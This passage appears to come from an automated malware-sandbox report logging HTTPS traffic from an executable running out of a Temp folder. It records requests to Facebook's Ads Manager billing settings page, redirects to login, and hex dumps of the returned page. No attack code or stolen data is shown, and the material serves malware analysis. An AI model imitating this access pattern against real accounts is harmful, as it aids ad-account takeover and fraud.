                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                sec-ch-prefers-color-scheme: light
                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                2022-10-13 11:08:14 UTC4847INHTTP/1.1 302 Found
                                                                                                                Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                x-fb-rlafr: 0
                                                                                                                document-policy: force-load-at-top
                                                                                                                cross-origin-resource-policy: same-origin
                                                                                                                cross-origin-opener-policy: same-origin-allow-popups
                                                                                                                Pragma: no-cache
                                                                                                                Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: DENY
                                                                                                                content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                2022-10-13 11:08:14 UTC4849INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                8192.168.2.549737157.240.20.35443C:\Users\user\AppData\Local\Temp\EAA.exe
                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                2022-10-13 11:08:14 UTC4851OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                Host: www.facebook.com
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                viewport-width: 1920
                                                                                                                sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                sec-ch-prefers-color-scheme: light
                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                2022-10-13 11:08:15 UTC4851INHTTP/1.1 200 OK
                                                                                                                Vary: Accept-Encoding
                                                                                                                report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                x-fb-rlafr: 0
                                                                                                                document-policy: force-load-at-top
                                                                                                                cross-origin-opener-policy: unsafe-none
                                                                                                                Pragma: no-cache
                                                                                                                Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: DENY
                                                                                                                content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                2022-10-13 11:08:15 UTC4853INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                2022-10-13 11:08:15 UTC4854INData Raw: 63 64 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4d 35 70 41 6c 78 55 30 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
                                                                                                                Data Ascii: cd55<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="M5pAlxU0">function envFlush(a){function b(b){for(var c in a)b[c]=a
                                                                                                                2022-10-13 11:08:15 UTC4856INData Raw: 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 77 65 62 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                                                                Data Ascii: com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https
                                                                                                                2022-10-13 11:08:15 UTC4857INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 69 2f 6c 2f 30 2c 63 72 6f 73 73 2f 75 61 52 55 5a 6b 31 38 79 4e 49 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 59 6f 32 55 7a 4f 68 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 53 2f 72 2f 56 5f 77 4a 38 45 51 75 2d 76 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72
                                                                                                                Data Ascii: ="https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/uaRUZk18yNI.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Yo2UzOh" crossorigin="anonymous" /><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/V_wJ8EQu-vo.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader
                                                                                                                2022-10-13 11:08:15 UTC4859INData Raw: 54 37 7a 75 65 47 4c 68 47 6f 30 63 54 35 78 70 70 45 22 7d 2c 22 31 37 33 38 34 38 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 63 58 33 37 6f 51 63 6f 36 44 77 68 55 57 6f 45 22 7d 7d 2c 22 71 70 6c 44 61 74 61 22 3a 7b 22 37 37 35 38 22 3a 7b 22 72 22 3a 31 7d 7d 7d 29 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 2c 22 53 65 72 76 65 72 4a 53 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 54 69 6d 65 53 6c 69 63 65 2c 53 65 72 76 65 72 4a 53 29 7b 28 6e 65 77 20 53 65 72 76 65 72 4a 53 28 29 29 2e 68 61 6e 64 6c 65 28 7b 22 64 65 66 69 6e 65 22 3a 5b 5b 22 55 52 4c 46 72 61 67 6d 65 6e 74 50 72 65 6c 75 64 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 68 61 73 68 74 61 67 52
                                                                                                                Data Ascii: T7zueGLhGo0cT5xppE"},"1738486":{"result":false,"hash":"AT4cX37oQco6DwhUWoE"}},"qplData":{"7758":{"r":1}}})});requireLazy(["TimeSliceImpl","ServerJS"],function(TimeSlice,ServerJS){(new ServerJS()).handle({"define":[["URLFragmentPreludeConfig",[],{"hashtagR
                                                                                                                2022-10-13 11:08:15 UTC4860INData Raw: 2c 5b 5d 2c 7b 7d 2c 34 39 30 5d 2c 5b 22 43 75 72 72 65 6e 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 5b 5d 2c 7b 22 66 61 63 65 62 6f 6f 6b 64 6f 74 63 6f 6d 22 3a 74 72 75 65 2c 22 6d 65 73 73 65 6e 67 65 72 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 77 6f 72 6b 70 6c 61 63 65 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 69 6e 73 74 61 67 72 61 6d 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 7d 2c 38 32 37 5d 2c 5b 22 43 75 72 72 65 6e 74 55 73 65 72 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 22 41 43 43 4f 55 4e 54 5f 49 44 22 3a 22 30 22 2c 22 55 53 45 52 5f 49 44 22 3a 22 30 22 2c 22 4e 41 4d 45 22 3a 22 22 2c 22 53 48 4f 52 54 5f 4e 41 4d 45 22 3a 6e 75 6c 6c 2c 22 49 53 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 5f 41 43 43 4f 55 4e 54 22
                                                                                                                Data Ascii: ,[],{},490],["CurrentEnvironment",[],{"facebookdotcom":true,"messengerdotcom":false,"workplacedotcom":false,"instagramdotcom":false},827],["CurrentUserInitialData",[],{"ACCOUNT_ID":"0","USER_ID":"0","NAME":"","SHORT_NAME":null,"IS_BUSINESS_PERSON_ACCOUNT"
                                                                                                                2022-10-13 11:08:15 UTC4862INData Raw: 72 4d 69 6e 6f 72 56 65 72 73 69 6f 6e 22 3a 30 2c 22 62 72 6f 77 73 65 72 4e 61 6d 65 22 3a 22 43 68 72 6f 6d 65 22 2c 22 62 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 22 3a 31 30 34 2c 22 64 65 76 69 63 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 4e 61 6d 65 22 3a 22 57 65 62 4b 69 74 22 2c 22 65 6e 67 69 6e 65 56 65 72 73 69 6f 6e 22 3a 22 35 33 37 2e 33 36 22 2c 22 70 6c 61 74 66 6f 72 6d 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 70 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 22 2c 22 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 2c 22 70 6c 61 74 66 6f 72 6d 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 7d 2c 35 32 37 5d 2c 5b 22 50 72 6f 6d 69 73 65 55 73 65 50 6f 6c
                                                                                                                Data Ascii: rMinorVersion":0,"browserName":"Chrome","browserVersion":104,"deviceName":"Unknown","engineName":"WebKit","engineVersion":"537.36","platformArchitecture":"64","platformName":"Windows","platformVersion":"10","platformFullVersion":"10"},527],["PromiseUsePol
                                                                                                                2022-10-13 11:08:15 UTC4863INData Raw: 41 4d 45 22 2c 22 49 43 5f 44 49 53 41 42 4c 45 5f 4d 45 52 47 45 5f 54 4f 4f 4c 5f 46 45 45 44 5f 43 48 45 43 4b 5f 46 4f 52 5f 52 45 50 4c 41 43 45 5f 53 43 48 45 44 55 4c 45 22 2c 22 41 44 53 5f 45 50 44 5f 49 4d 50 41 43 54 45 44 5f 41 44 56 45 52 54 49 53 45 52 5f 4d 49 47 52 41 54 45 5f 58 43 4f 4e 54 52 4f 4c 4c 45 52 22 2c 22 52 45 43 52 55 49 54 49 4e 47 5f 43 41 4e 44 49 44 41 54 45 5f 50 4f 52 54 41 4c 5f 41 43 43 4f 55 4e 54 5f 44 45 4c 45 54 49 4f 4e 5f 43 41 52 44 22 2c 22 42 49 5a 5f 49 4e 42 4f 58 5f 50 4f 50 5f 55 50 5f 54 49 50 5f 4e 41 56 49 47 41 54 49 4f 4e 5f 42 55 47 5f 46 49 58 22 2c 22 53 52 54 5f 52 45 56 49 45 57 5f 44 49 53 41 42 4c 45 5f 46 45 4c 4c 4f 57 53 48 49 50 5f 52 45 56 49 45 57 22 2c 22 45 4f 5f 53 54 4f 52 45 5f 48
                                                                                                                Data Ascii: AME","IC_DISABLE_MERGE_TOOL_FEED_CHECK_FOR_REPLACE_SCHEDULE","ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER","RECRUITING_CANDIDATE_PORTAL_ACCOUNT_DELETION_CARD","BIZ_INBOX_POP_UP_TIP_NAVIGATION_BUG_FIX","SRT_REVIEW_DISABLE_FELLOWSHIP_REVIEW","EO_STORE_H
                                                                                                                2022-10-13 11:08:15 UTC4865INData Raw: 74 61 74 61 63 6c 69 71 2e 63 6f 6d 22 2c 22 62 73 2e 73 65 72 76 69 6e 67 2d 73 79 73 2e 63 6f 6d 22 2c 22 6b 6f 68 6c 73 2e 63 6f 6d 22 2c 22 6c 61 7a 61 64 61 2e 63 6f 2e 74 68 22 2c 22 78 67 34 6b 65 6e 2e 63 6f 6d 22 2c 22 74 65 63 68 6e 6f 70 61 72 6b 2e 72 75 22 2c 22 6f 66 66 69 63 65 64 65 70 6f 74 2e 63 6f 6d 2e 6d 78 22 2c 22 62 65 73 74 62 75 79 2e 63 6f 6d 2e 6d 78 22 2c 22 62 6f 6f 6b 69 6e 67 2e 63 6f 6d 22 2c 22 6e 69 62 69 6f 2e 6e 6f 22 5d 7d 2c 33 38 37 31 5d 2c 5b 22 49 6e 69 74 69 61 6c 43 6f 6f 6b 69 65 43 6f 6e 73 65 6e 74 22 2c 5b 5d 2c 7b 22 64 65 66 65 72 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 69 6e 69 74 69 61 6c 43 6f 6e 73 65 6e 74 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 5d 7d 2c 22 6e 6f 43 6f 6f 6b 69 65 73 22 3a 66 61
                                                                                                                Data Ascii: tatacliq.com","bs.serving-sys.com","kohls.com","lazada.co.th","xg4ken.com","technopark.ru","officedepot.com.mx","bestbuy.com.mx","booking.com","nibio.no"]},3871],["InitialCookieConsent",[],{"deferCookies":false,"initialConsent":{"__set":[]},"noCookies":fa
                                                                                                                2022-10-13 11:08:15 UTC4866INData Raw: 5b 5e 5c 75 30 30 30 31 5d 2a 29 5c 75 30 30 30 31 5c 2f 22 3a 22 6a 61 76 61 73 63 72 69 70 74 22 7d 7d 2c 31 34 39 36 5d 2c 5b 22 49 6e 74 6c 56 69 65 77 65 72 43 6f 6e 74 65 78 74 22 2c 5b 5d 2c 7b 22 47 45 4e 44 45 52 22 3a 33 2c 22 72 65 67 69 6f 6e 61 6c 4c 6f 63 61 6c 65 22 3a 6e 75 6c 6c 7d 2c 37 37 32 5d 2c 5b 22 4e 75 6d 62 65 72 46 6f 72 6d 61 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 64 65 63 69 6d 61 6c 53 65 70 61 72 61 74 6f 72 22 3a 22 2e 22 2c 22 6e 75 6d 62 65 72 44 65 6c 69 6d 69 74 65 72 22 3a 22 2c 22 2c 22 6d 69 6e 44 69 67 69 74 73 46 6f 72 54 68 6f 75 73 61 6e 64 73 53 65 70 61 72 61 74 6f 72 22 3a 34 2c 22 73 74 61 6e 64 61 72 64 44 65 63 69 6d 61 6c 50 61 74 74 65 72 6e 49 6e 66 6f 22 3a 7b 22 70 72 69 6d 61 72 79 47 72 6f 75 70
                                                                                                                Data Ascii: [^\u0001]*)\u0001\/":"javascript"}},1496],["IntlViewerContext",[],{"GENDER":3,"regionalLocale":null},772],["NumberFormatConfig",[],{"decimalSeparator":".","numberDelimiter":",","minDigitsForThousandsSeparator":4,"standardDecimalPatternInfo":{"primaryGroup
                                                                                                                2022-10-13 11:08:15 UTC4867INData Raw: 5c 2f 6c 6f 67 67 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 74 72 22 3a 31 2c 22 5c 2f 74 72 5c 2f 22 3a 31 2c 22 5c 2f 73 65 6d 5f 63 61 6d 70 61 69 67 6e 73 5c 2f 73 65 6d 5f 70 69 78 65 6c 5f 74 65 73 74 5c 2f 22 3a 31 2c 22 5c 2f 62 6f 6f 6b 6d 61 72 6b 73 5c 2f 66 6c 79 6f 75 74 5c 2f 62 6f 64 79 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 62 6e 6f 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 70 6f 6c 69 63 69 65 73 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 69 6e 74 65 72 6e 65 74 64 6f 74 6f 72 67 5c 2f 63 6c 61 73 73 69 66 69 65 72 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 64 6f 67 66 6f 6f 64 69 6e 67 22 3a 31 2c 22 5c 2f 78 74 69 2e 70 68 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66
                                                                                                                Data Ascii: \/logging\/":1,"\/tr":1,"\/tr\/":1,"\/sem_campaigns\/sem_pixel_test\/":1,"\/bookmarks\/flyout\/body\/":1,"\/zero\/subno\/":1,"\/confirmemail.php":1,"\/policies\/":1,"\/mobile\/internetdotorg\/classifier\/":1,"\/zero\/dogfooding":1,"\/xti.php":1,"\/zero\/f
                                                                                                                2022-10-13 11:08:15 UTC4869INData Raw: 22 5c 2f 77 61 70 5c 2f 62 69 72 74 68 64 61 79 5f 68 65 6c 70 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 64 61 74 61 70 6f 6c 69 63 79 22 3a 31 2c 22 5c 2f 61 5c 2f 74 69 6d 65 7a 6f 6e 65 2e 70 68 70 22 3a 31 2c 22 5c 2f 61 5c 2f 62 7a 22 3a 31 2c 22 5c 2f 62 7a 5c 2f 72 65 6c 69 61 62 69 6c 69 74 79 22 3a 31 2c 22 5c 2f 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 6d 72 5c 2f 22 3a 31 2c 22 5c 2f 72 65 67 5c 2f 22 3a 31 2c 22 5c 2f 72 65 67 69 73 74 72 61
                                                                                                                Data Ascii: "\/wap\/birthday_help.php":1,"\/wap\/c.php":1,"\/wap\/confirmemail.php":1,"\/wap\/cr.php":1,"\/wap\/login.php":1,"\/wap\/r.php":1,"\/zero\/datapolicy":1,"\/a\/timezone.php":1,"\/a\/bz":1,"\/bz\/reliability":1,"\/r.php":1,"\/mr\/":1,"\/reg\/":1,"\/registra
                                                                                                                2022-10-13 11:08:15 UTC4870INData Raw: 6f 73 73 5f 74 69 6d 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 66 61 6c 6c 62 61 63 6b 5f 66 6f 72 5f 62 72 22 3a 74 72 75 65 2c 22 66 69 78 5f 62 72 5f 69 6e 69 74 5f 72 63 22 3a 66 61 6c 73 65 2c 22 71 75 65 75 65 5f 61 63 74 69 76 61 74 69 6f 6e 5f 65 78 70 65 72 69 6d 65 6e 74 22 3a 66 61 6c 73 65 2c 22 6d 61 78 5f 64 65 6c 61 79 5f 62 72 5f 71 75 65 75 65 22 3a 36 30 30 30 30 2c 22 6d 61 78 5f 64 65 6c 61 79 5f 62 72 5f 71 75 65 75 65 5f 69 6d 6d 65 64 69 61 74 65 22 3a 33 7d 2c 35 32 33 37 5d 2c 5b 22 63 72 3a 36 39 36 37 30 33 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 32 7a 70 6a 36 7a 31 31 37 34 5f 51 30 48 55 77 55 48 36 42 41 48 50 6e 6e 67 41 32 41 35 34 65 78 52 2d 54 54 4d 53 41 61 74 38 4a 49 71 55 4f 61
                                                                                                                Data Ascii: oss_timer":false,"enable_fallback_for_br":true,"fix_br_init_rc":false,"queue_activation_experiment":false,"max_delay_br_queue":60000,"max_delay_br_queue_immediate":3},5237],["cr:696703",[],{"__rc":[null,"Aa2zpj6z1174_Q0HUwUH6BAHPnngA2A54exR-TTMSAat8JIqUOa
                                                                                                                2022-10-13 11:08:15 UTC4872INData Raw: 31 38 33 35 37 39 22 2c 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 2c 22 41 61 32 7a 70 6a 36 7a 31 31 37 34 5f 51 30 48 55 77 55 48 36 42 41 48 50 6e 6e 67 41 32 41 35 34 65 78 52 2d 54 54 4d 53 41 61 74 38 4a 49 71 55 4f 61 51 79 59 57 64 42 79 6b 6b 41 6a 69 56 62 7a 5a 44 55 64 73 59 61 32 44 61 48 79 52 74 62 68 78 35 79 46 36 2d 72 4c 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 32 35 31 30 30 22 2c 5b 22 52 75 6e 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 52 75 6e 42 6c 75 65 22 2c 22 41 61 32 7a 70 6a 36 7a 31 31 37 34 5f 51 30 48 55 77 55 48 36 42 41 48 50 6e 6e 67 41 32 41 35 34 65 78 52 2d 54 54 4d 53 41 61 74 38 4a 49
                                                                                                                Data Ascii: 183579",["InlineFbtResultImpl"],{"__rc":["InlineFbtResultImpl","Aa2zpj6z1174_Q0HUwUH6BAHPnngA2A54exR-TTMSAat8JIqUOaQyYWdBykkAjiVbzZDUdsYa2DaHyRtbhx5yF6-rLc"]},-1],["cr:925100",["RunBlue"],{"__rc":["RunBlue","Aa2zpj6z1174_Q0HUwUH6BAHPnngA2A54exR-TTMSAat8JI
